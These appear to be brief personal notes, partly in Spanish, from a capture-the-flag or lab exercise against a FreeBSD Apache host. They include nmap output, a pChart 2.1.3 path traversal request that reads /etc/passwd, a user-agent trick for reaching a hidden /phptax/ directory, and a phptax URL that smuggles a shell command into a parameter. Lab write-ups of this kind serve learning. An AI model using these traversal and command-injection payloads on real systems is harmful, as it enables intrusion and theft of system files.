192.168.111.134

PORT     STATE  SERVICE VERSION                                                                                                                                                                                                            
22/tcp   closed ssh                                                                                                                                                                                                                        
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

pChart2.1.3/index.php
?Action=View&Script=%2f..%2f..%2fetc/passwd PATH TRAVERSAL

Por arte de magia, tras no saber qué hacer, leo de un writeup que hay que usar el User Agent de Internet Explorer 6.1 (Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)) así que tiro por ahí, y veo un directorio nada más acceder a la IP: /phptax/

/phptax/index.php?pfilez=1040d1-pg2.tob;pwd > pwd.txt";&pdf=make
